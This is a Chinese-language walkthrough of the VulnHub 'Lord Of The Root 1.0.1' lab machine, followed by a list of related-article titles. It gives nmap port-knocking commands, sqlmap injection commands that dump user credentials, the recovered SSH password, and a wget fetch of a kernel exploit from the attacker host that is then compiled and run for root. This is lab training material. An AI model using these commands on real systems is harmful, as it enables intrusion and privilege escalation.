VulnHub-Lord Of The Root: 1.0.1

靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/
目标:得到root权限&找到flag.txt
作者:尼德霍格007
时间:2021-7-16

信息收集

扫描目标主机

nmap -sP 192.168.21.0/24

扫描开放端口

nmap -A -p 1-1000 192.168.21.141

看到只开放了22端口,尝试连接一下

easy as 1,2,3

提示敲门程序在运行

发送tcp的数据包分别到这三个端口

nmap -r -Pn -p 1,2,3 192.168.21.141

再次扫描端口

发现开启了1337端口,是个web服务,尝试访问

只有一张图,英文来自指环王,意思是我愿意把魔戒带到MORDOR,访问一下mordor试试

查看源代码

有一串密文,像是base64

THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh

解密两次得到

/978345210/index.php

是一个路径,访问

获取shell

尝试弱口令登陆失败,就不放图了

不知道用户名和密码的情况下,可以使用SQLMAP注入试一下

sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms --dbs

-o:开启所有优化
-u:指定目标URL
–forms:自动判断注入
–dbs:枚举DBMS所有的数据库名称

(有提示y/n时,看不懂默认y就可以或者直接回车)

这里获得了一个Webapp数据库,继续获取Webapp表信息

sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp --tables

-D:指定数据库
–tables:列出该数据库所有的表

这里获得了一个Users表

继续对表内容进行信息获取

sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp  -T Users --columns

-T:指定表
–columns:列出该表的所有表项

表中有三个字段id,password,和username

继续获取表中详细信息

 sqlmap -o -u http://192.168.21.141:1337/978345210/index.php --forms -D Webapp  -T Users -C id,username,password --dump

-C:指定列
–dump:转储DBMS的数据库中的表项

得到用户名和密码,使用这些用户名和密码ssh登录

ssh *用户名*@*ip*

最后成功登录

用户名:smeagol

密码:MyPreciousR00t

提权

uname -a查看靶机内核版本和系统版本

在https://www.exploit-db.com/查找可利用漏洞

点击下载按钮把exp文件下载到本地

在kali攻击机用python开启一个简单的http服务

python -m SimpleHTTPServer 6666

把文件下载到靶机

靶机执行

wget http://192.168.21.128:6666/39166.c

编译

gcc 39166.c -o p

-o指定编译后的文件名

给执行权限

chmod +x p

运行

./p

此时可以看到已经是root组的用户了,提权成功

获得flag,任务完成

总结

这次的漏洞复现主要考察了port_knocking、使用sqlmap获取数据库信息和利用ubuntu系统漏洞来提权,难度适中。对我来说,port_knocking是之前没有见到过的,需要多加练习。而且使用sqlmap获取数据库信息和查找系统漏洞进行利用的能力也需要多加锻炼。

6-VulnHub-Lord Of The Root 1.0.1相关推荐

  1. VulnHub靶场之BBS (cute): 1.0.1

    VulnHub靶场之BBS (cute): 1.0.1 扫描IP以及端口: 先不管其他东西,直接访问80,web页面: 目录扫描: 访问index.php: 发现使用的是CuteNews 2.1.2, ...

  2. mysql开启skip-name-resolve 导致root@127.0.0.1(localhost)访问引发的ERROR 1045 (28000)错误解决方案...

    为什么配置skip-name-resolve? 由于mysql -h${ip} 远程访问速度过慢, mysql -h172.16.66.171 -uroot -p123456 根据网友经验(https ...

  3. 登录或连接MYSLQ 提示 error 1045 access denied for user 'root@127.0.0.1' 错误

    MYSQL登陆不了 出现1024错误 类似: 用 root 登陆 出现: Access denied for user 'root@127.0.0.1'  (password yes),密码是正确的 ...

  4. 【渗透测试】VulnHub-Lord Of The Root: 1.0.1

    VulnHub-Lord Of The Root: 1.0.1 VulnHub-Lord Of The Root: 1.0.1渗透测试详细流程 小知识点 一.端口碰撞(portknocking) 二. ...

  5. mySQL:Access denied for user 'root'@'127.0.0.1' to database 'information_schema'

    在写程序时尝试修改视图的备注,可是mysql并没有提供这样的功能,可是查询视图结构时明明能够看到有的视图是有注释信息的,这些信息是写到information_schema里的,那如果直接更新infor ...

  6. l连接mysql数据库时报错(1045, Access denied for user 'root'@'127.0.0.1 (using password: YES))

    具体内容:Traceback (most recent call last): File "E:/python_events/ch01/mysqldb_test.py", line ...

  7. linux root hd0 0,root (hd0 0)讲解

    hd0,0 指得是 0号硬盘的0号分区,以此类推,hd0,2 指的是0号硬盘的2号分区.这里hd应该是硬盘的缩写,和sda, hda没关系.(说错求砖头,哈哈)另外这里的root,指得是可引导的分区, ...

  8. 1405 Access denied for user ‘root@127.0.0.1‘

    1405 Access denied for user 'root@127.0.0.1' 连接不上 右键点击数据库的连接属性,改为正确的用户名和密码

  9. Vulnhub靶机:HACKER KID_ 1.0.1

    目录 介绍 信息收集 主机发现 主机信息探测 53 端口 网站探测 页面源代码 DIG信息收集 经典XXE漏洞 探测9999端口 SSTI模板注入 Capabilities 提权 发现具有Capabi ...

最新文章

  1. Python基础06-数据类型:元组tuple
  2. MS SQL入门基础:备份和恢复系统数据库
  3. 边缘计算对于工业物联网的重要性
  4. linux打理ftp用户,Linux中如何添加/删除FTP用户并设置权限
  5. 几乎所有的成功都是厚积薄发
  6. 微信小程序 推送模板教程 附源码
  7. 系统磁盘空间满的一个问题
  8. php权限设置,php设置权限的方法
  9. Linux内核开发人员考虑剔除对更多老旧平台的处理器支持
  10. 【A little interesting】LeetCode 437. Path Sum III
  11. 小米盒子 计算机共享,小米盒子如何通过局域网共享安装软件
  12. c语言自学教程——博文总结
  13. 如何测试聊天机器人的 10 个最佳实践
  14. 优秀博士生和普通博士生差距能有多大?
  15. scripts to compositions to videos
  16. Magisk使用记录
  17. Cesium — orientation计算
  18. JAVA开发基础之使用IDEA导出JAR包
  19. [配置]keepalived配置高可用虚拟IP不通
  20. PySOT测试报错:AssertionError: /pysot/experiments/siamrpn_r50_l234_dwxcorr/Basketball/img/0001.jpg

热门文章

  1. Lecture 21
  2. [转载] 地下创业,遵守游戏规则方能细水长流
  3. 四级网络工程师:局域网技术
  4. Windows Server 2008 R2——由于管理员设置的策略,该磁盘处于脱机状态-解决方案
  5. PAT 10. 查找指定字符 python
  6. 2022-02-12生活日志
  7. MATLAB算法实战应用案例精讲-【图像处理】数字图像海报化(附Java、python、matlab和R语言代码实现)
  8. Android相机实时自动对焦的完美实现
  9. 2013年软件工程c语言,《C语言程序设计》实验报告模板-2013级软件工程.doc
  10. python代码写父亲节快乐_用python祝福父亲节_父亲节祝福语 父亲节最感恩温馨的问候语录...